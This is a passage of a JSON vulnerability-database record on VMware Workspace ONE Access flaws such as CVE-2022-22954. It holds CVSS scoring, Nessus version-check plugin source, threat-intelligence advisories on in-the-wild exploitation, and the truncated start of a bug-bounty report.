"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:vmware:workspace_one_access", "cpe:/a:vmware:identity_manager"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_CVE-2022-22954.NBIN", "href": "https://www.tenable.com/plugins/nessus/160182", "sourceData": "Binary data vmware_workspace_one_access_cve-2022-22954.nbin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T19:19:52", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:00:00", "type": "nessus", "title": "VMware Workspace ONE Access / VMware Identity Manager Server-Side Template Injection", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-21T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_113221", "href": "https://www.tenable.com/plugins/was/113221", "sourceData": "No source data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-26T19:34:22", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vmware:identity_manager", "cpe:/a:vmware:workspace_one_access"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/163939", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163939);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2022-31656\",\n \"CVE-2022-31657\",\n \"CVE-2022-31658\",\n \"CVE-2022-31659\",\n \"CVE-2022-31660\",\n \"CVE-2022-31661\",\n \"CVE-2022-31662\",\n \"CVE-2022-31663\",\n \"CVE-2022-31664\",\n \"CVE-2022-31665\"\n );\n script_xref(name:\"VMSA\", value:\"2022-0021\");\n script_xref(name:\"IAVA\", value:\"2022-A-0303\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0027\");\n\n script_name(english:\"VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access\n to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://core.vmware.com/vmsa-2022-0021-questions-answers-faq\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/89096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-160130 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2022-0021 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-31656\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware Workspace ONE Access CVE-2022-31660');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\", \"vmware_workspace_one_access_installed.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'VMware Workspace ONE Access';\n\nvar app_info = vcf::vmware_workspace_one_access::get_app_info(combined:TRUE);\n\n# 3.3.[3456] don't have fixed builds, so audit out unless we are doing a paranoid scan\n# Remote detection does not pull hotfixes. Require paranoia\nif ((app_info.webapp || app_info.version =~ \"3\\.3\\.[3456]\\.\") && report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app, app_info.version);\n\nvar patch = '160130';\n\nvar constraints = [\n { 'min_version':'3.3.4.0.0', 'fixed_version':'3.3.7.0.0', 'fixed_display':'Refer to vendor advisory and apply patch HW-160130.' },\n\n { 'min_version':'19.03.0.1', 'max_version':'19.03.0.1.99999999', 'fixed_display':'19.03.0.1 with HW-160130' },\n \n { 'min_version':'21.08.0.0.0', 'max_version':'21.08.0.0.99999999', 'fixed_display':'21.08.0.0 with HW-160130' },\n { 'min_version':'21.08.0.1', 'max_version':'21.08.0.1.99999999', 'fixed_display':'21.08.0.1 with HW-160130' }\n];\n\nvcf::vmware_workspace_one_access::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, expected_patch:patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-26T18:40:36", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by the following vulnerabilities:\n\n - Server-side Template Injection Remote Code Execution Vulnerability (CVE-2022-22954)\n - OAuth2 ACS Authentication Bypass Vulnerabilities (CVE-2022-22955, CVE-2022-22956)\n - JDBC Injection Remote Code Execution Vulnerabilities (CVE-2022-22957, CVE-2022-22958)\n - Cross Site Request Forgery Vulnerability (CVE-2022-22959)\n - Local Privilege Escalation Vulnerability (CVE-2022-22960)\n - Information Disclosure Vulnerability (CVE-2022-22961)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-06T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0011)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961"], "modified": "2023-01-26T00:00:00", "cpe": ["cpe:/a:vmware:workspace_one_access", "cpe:/a:vmware:identity_manager"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0011.NASL", "href": "https://www.tenable.com/plugins/nessus/159548", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159548);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/26\");\n\n script_cve_id(\n \"CVE-2022-22954\",\n \"CVE-2022-22955\",\n \"CVE-2022-22956\",\n \"CVE-2022-22957\",\n \"CVE-2022-22958\",\n \"CVE-2022-22959\",\n \"CVE-2022-22960\",\n \"CVE-2022-22961\"\n );\n script_xref(name:\"VMSA\", value:\"2022-0011\");\n script_xref(name:\"IAVA\", value:\"2022-A-0136-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/05\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0012\");\n\n script_name(english:\"VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0011)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby the following vulnerabilities:\n\n - Server-side Template Injection Remote Code Execution Vulnerability (CVE-2022-22954)\n - OAuth2 ACS Authentication Bypass Vulnerabilities (CVE-2022-22955, CVE-2022-22956)\n - JDBC Injection Remote Code Execution Vulnerabilities (CVE-2022-22957, CVE-2022-22958)\n - Cross Site Request Forgery Vulnerability (CVE-2022-22959)\n - Local Privilege Escalation Vulnerability (CVE-2022-22960)\n - Information Disclosure Vulnerability (CVE-2022-22961)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0011.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/88099\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-154129 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2022-0011 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22954\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22956\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware Workspace ONE Access CVE-2022-22954');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'VMware Workspace ONE Access';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nvar port = get_http_port(default:80);\n\nvar app_info = vcf::vmware_workspace_one_access::get_app_info(port:port);\n\n# 3.3.[3456] don't have fixed builds, so audit out unless we are doing a paranoid scan\nif (app_info.version =~ \"3\\.3\\.[3456]\\.\" && report_paranoia < 2)\n audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'min_version':'3.3.3.0.0', 'fixed_version':'3.3.4.0.0', 'fixed_display':'3.3.3 with HW-154129' },\n { 'min_version':'3.3.4.0.0', 'fixed_version':'3.3.5.0.0', 'fixed_display':'3.3.4 with HW-154129' },\n { 'min_version':'3.3.5.0.0', 'fixed_version':'3.3.6.0.0', 'fixed_display':'3.3.5 with HW-154129' },\n { 'min_version':'3.3.6.0.0', 'fixed_version':'3.3.7.0.0', 'fixed_display':'3.3.6 with HW-154129' },\n\n { 'min_version':'20.10.0.0', 'fixed_version':'20.10.0.0.19540061', 'fixed_display':'20.10.0.0 Build 19540061 (HW-154129)' },\n { 'min_version':'20.10.0.1', 'fixed_version':'20.10.0.1.19540061', 'fixed_display':'20.10.0.1 Build 19540061 (HW-154129)' },\n { 'min_version':'21.08.0.0', 'fixed_version':'21.08.0.0.19539711', 'fixed_display':'21.08.0.0 Build 19539711 (HW-154129)' },\n { 'min_version':'21.08.0.1', 'fixed_version':'21.08.0.1.19539711', 'fixed_display':'21.08.0.1 Build 19539711 (HW-154129)' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-05-09T13:46:51", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here An Iranian cyber espionage gang known as Rocket Kitten has began delivering the Core Impact penetration testing tool on susceptible computers by exploiting a newly fixed severe vulnerability in VMware Workspace ONE Access/Identity Manager program. Threat actors use the VMWare Identity Manager Service flaw (CVE-2022-22954) to acquire initial access to a target system, then install a PowerShell stager to download the next stage payload, nicknamed PowerTrash Loader. The PowerTrash Loader is a 40,000-line PowerShell script that has been substantially obfuscated. PowerTrash Downloader introduces the penetration testing framework Core Impact to memory at the end of the attack chain. The MITRE ATT&amp;CK TTPs commonly used by Rocket Kitten are: TA0001: Initial Access TA0002: Execution TA0006: Credential Access TA0009: Collection TA0011: Command and Control T1059 - Command and Scripting Interpreter T1189 - Drive-by Compromise T1555.003: Credentials from Password Stores: Credentials from Web Browsers T1105: Ingress Tool Transfer T1056.001: Input Capture: Keylogging T1566.001: Phishing: Spearphishing Attachmet T1566.003: Phishing: Spearphishing via Servicen T1204.002: User Execution: Malicious File Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patch Links https://www.vmware.com/security/advisories/VMSA-2022-0011.html References https://blog.morphisec.com/vmware-identity-manager-attack-backdoor", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T12:44:24", "type": "hivepro", "title": "Newly patched VMware vulnerability exploited by Iranian espionage group, Rocket Kitten", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-26T12:44:24", "id": "HIVEPRO:8AB9E397F60C70B7C96C5D3CDA945A77", "href": "https://www.hivepro.com/newly-patched-vmware-vulnerability-exploited-by-iranian-espionage-group-rocket-kitten/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T19:32:38", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Multiple vulnerabilities have been discovered in VMware products. Two of these have been exploited in the wild. The first zero-day vulnerability, CVE-2022-22954, is a server-side template injection flaw. An attacker could exploit this bug to gain network access and remotely execute code in order to deliver cryptominers. Several Proof of Concepts (PoCs) of this issue indicates that it could be weaponized by ransomwares/ threat actor groups soon. The second zero-day vulnerability, CVE-2022-22960 exists due to improper permissions in support scripts. An attacker could exploit this issue to escalate privileges to root on vulnerable servers. Organizations have advised the patch of all these vulnerabilities as soon as possible to avoid exploitation. Potential MITRE ATT&amp;CK TTPs are: TA0042: Resource Development TA0001: Initial Access TA0004: Privilege Escalation T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities T1190: Exploit Public-Facing Application T1548: Abuse Elevation Control Mechanism T1068: Exploitation for Privilege Escalation Vulnerability Detail Patch Links https://kb.vmware.com/s/article/88099 References https://www.vmware.com/security/advisories/VMSA-2022-0011.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-18T13:06:29", "type": "hivepro", "title": "Two actively exploited vulnerabilities affect multiple VMware products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-18T13:06:29", "id": "HIVEPRO:850B279759C02AA5967698B7B141C8C2", "href": "https://www.hivepro.com/two-actively-exploited-vulnerabilities-affect-multiple-vmware-products/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T03:41:41", "description": "Threat Level Vulnerability Report For a detailed advisory, download the pdf file here Summary The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to organizations about malicious actors using CVE-2022-22954 and CVE-2022-22960. This alert was published following the disclosure of two related vulnerabilities (CVE-2022-22972 and CVE-2022-22973), putting it vulnerable to future exploitation. All these flaws might be exploited separately or in combination to obtain total control.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T14:34:51", "type": "hivepro", "title": "Vulnerabilities in VMware when chained together grants Full System Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T14:34:51", "id": "HIVEPRO:4FB5DD5F7C41E3797518D866E88BFA8C", "href": "https://www.hivepro.com/vulnerabilities-in-vmware-when-chained-together-grants-full-system-control/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-21T07:30:07", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&amp;CK TTPs 765 14 1 2 6 25 The third week of April 2022 witnessed a huge spike on the discovery of 765 vulnerabilities out of which 14 gained the attention of Threat Actors and security researchers worldwide. Among these 14, there were 5 zero-day, 9 of them are undergoing analysis and 2 other vulnerabilities about which the National vulnerability Database (NVD) is awaiting analysis while 1 was not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. Further, we also observed a Threat Actor groups being highly active in the last week. OldGremlin, a Russian threat actor group popular for financial crime and gain, was observed targeting Russian agencies Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-24521* CVE-2022-26904* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 CVE-2022-1364* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2022-22954* CVE-2022-22955 CVE-2022-22956 CVE-2022-22957 CVE-2022-22958 CVE-2022-22959 CVE-2022-22960* CVE-2022-22961 https://kb.vmware.com/s/article/88099 CVE-2018-6882 https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7 CVE-2022-25165 CVE-2022-25166 https://aws.amazon.com/vpn/client-vpn-download/ *zero-day vulnerability Active Actors: Icon Name Origin Motive OldGremlin Russia Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0011: Command and Control T1592: Gather Victim Host Information T1583: Acquire Infrastructure T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1555: Credentials from Password Stores T1071: Application Layer Protocol T1592.001: Hardware T1583.002: DNS Server T1566: Phishing T1059.007: JavaScript T1068: Exploitation for Privilege Escalation T1027: Obfuscated Files or Information T1555.004: Windows Credential Manager T1071.004: DNS T1592.002: Software T1583.001: Domains T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1071.001: Web Protocols T1590: Gather Victim Network Information T1587: Develop Capabilities T1566.002: Spearphishing Link T1204: User Execution T1132: Data Encoding T1590.005: IP Addresses T1587.001: Malware T1204.002: Malicious File T1132.001: Standard Encoding T1585: Establish Accounts T1204.001: Malicious Link T1568: Dynamic Resolution T1585.002: Email Accounts T1568.002: Domain Generation Algorithms T1588: Obtain Capabilities T1573: Encrypted Channel T1588.006: Vulnerabilities T1573.001: Symmetric Cryptography T1572: Protocol Tunneling Threat Advisories: Two actively exploited vulnerabilities affect multiple VMware products Google Chrome issues an emergency update to address the third zero-day of year 2022 Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities Old Zimbra vulnerability used to target Ukrainian Government Organizations Two Vulnerabilities discovered in AWS Client VPN OldGremlin, a threat actor targeting Russian organizations with phishing emails since 2020", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T04:59:07", "type": "hivepro", "title": "Weekly Threat Digest: 11 \u2013 17 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6882", "CVE-2022-1364", "CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961", "CVE-2022-24521", "CVE-2022-25165", "CVE-2022-25166", "CVE-2022-26904"], "modified": "2022-04-21T04:59:07", "id": "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D", "href": "https://www.hivepro.com/weekly-threat-digest-11-17-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-03-16T16:32:17", "bounty": 0.0, "description": "I found that one of the targets belongs to **DOD** vulnerable to **CVE-2022-22954** where an attacker may be able to execute any malicious code like escalating Remote code execution is also possible \n\n**Technical Summary:**\n\nCVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.\n\n**Vulnerable 